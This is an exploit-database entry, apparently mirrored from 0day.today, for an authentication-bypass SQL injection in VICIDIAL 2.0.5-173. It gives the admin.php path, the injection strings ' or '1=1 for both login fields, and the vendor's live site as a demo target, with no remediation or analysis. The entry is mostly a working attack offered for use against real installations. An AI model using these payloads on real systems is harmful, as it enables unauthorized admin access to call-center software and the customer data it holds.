id: 5224
date: 05/20/2009
title: VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability
author: Striker7
cves: 

============================================================
VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability
============================================================


#########################################################################################################
[+] Type Exploit :VICIDIAL call center suite (Admin Bypass) SQL Injection Vulnerability
[+] Script Homepage :http://www.vicidial.org
[+] Discovered By Striker7
#########################################################################################################
 [+] Exploit(Ex):
  http://[Target].com/[path]/admin.php
   then >>
   Username:   ' or '1=1
   Password:   ' or '1=1
   [+]Live Demo:
   http://www.vicidial.org/vicidial/admin.php
#########################################################################################################



#  0day.today [2023-03-26]  #